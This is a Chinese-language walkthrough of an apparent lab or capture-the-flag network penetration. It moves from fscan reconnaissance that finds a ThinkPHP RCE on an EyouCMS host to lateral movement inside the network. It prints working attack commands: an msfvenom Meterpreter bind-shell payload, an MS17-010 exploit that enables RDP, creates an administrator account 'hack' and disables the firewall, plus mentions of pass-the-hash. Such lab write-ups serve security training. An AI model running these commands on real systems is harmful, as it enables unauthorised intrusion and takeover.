Fscan #
[root@Hacking] /home/kali/Desktop
❯ ./fscan -h 192.168.10.10 -p 80 ⏎
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-07-16 22:41:57] [INFO] 暴力破解线程数: 1
[2025-07-16 22:41:57] [INFO] 开始信息扫描
[2025-07-16 22:41:57] [INFO] 最终有效主机数量: 1
[2025-07-16 22:41:57] [INFO] 开始主机扫描
[2025-07-16 22:41:57] [INFO] 有效端口数量: 1
[2025-07-16 22:41:57] [SUCCESS] 端口开放 192.168.10.10:80
[2025-07-16 22:42:03] [SUCCESS] 服务识别 192.168.10.10:80 => [http]
[2025-07-16 22:42:03] [INFO] 存活端口数量: 1
[2025-07-16 22:42:03] [INFO] 开始漏洞扫描
[2025-07-16 22:42:03] [INFO] 加载的插件: webpoc, webtitle
[2025-07-16 22:42:04] [SUCCESS] 网站标题 http://192.168.10.10 状态码:200 长度:25157 标题:易优CMS - Powered by Eyoucms.com
[2025-07-16 22:42:11] [SUCCESS] 目标: http://192.168.10.10:80
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-07-16 22:42:14] [SUCCESS] 扫描已完成: 2/2
发现存在thinkphp的rce漏洞
Thinkphp RCE #
Hashdump #
上传msf木马进行连接
[root@Hacking] /home/kali/lab1
❯ msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe ⏎
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 496 bytes
Final size of exe file: 7168 bytes
内网扫描 #
查看机器的ip信息,发现还存在一个192.168.20.10
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\fscan.exe -h 192.168.20.10/24
fscan.exe :
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.30 is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:135 open
192.168.20.30:88 open
192.168.20.10:3306 open
192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.30:135 open
192.168.20.10:135 open
192.168.20.10:80 open
[*] alive ports len is: 12
start vulscan
[*] NetBios 192.168.20.10 WORKGROUP\WIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600
[*] NetInfo
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[+] MS17-010 192.168.20.30 (Windows Server 2008 R2 Standard 7600)
[*] NetInfo
[*]192.168.20.30
[->]WIN-7NRTJO59O7N
[->]192.168.20.30
[+] MS17-010 192.168.20.20 (Windows Server 2012 R2 Standard 9600)
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.20.10 code:200 len:25157 title:鏄撲紭CMS - Powered by Eyoucms.com
[+] PocScan http://192.168.20.10 poc-yaml-thinkphp5023-method-rce poc1
扫描结果表示,192.168.20.30存在永恒之蓝漏洞,由于在内网,需要搭建代理,这里上传一个chisel
MS17-010 #
proxychains -q msfconsole
msf6 auxiliary(admin/smb/ms17_010_command) > set rhost 192.168.20.30
msf6 auxiliary(admin/smb/ms17_010_command) > set command type C:\\flag.txt
set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set COMMAND net user hack Admin@123 /add
set COMMAND net localgroup Administrators hack /add
set COMMAND netsh firewall set opmode disable
设置 fDenyTSConnections=0 → 启用 RDP,修改注册表,取消禁止远程连接。
proxychains -q rdesktop 192.168.20.30
.\,然后去下载CMS主机上的定向木马
PTH #
利用域控哈希可以登录到192.168.20.20主机
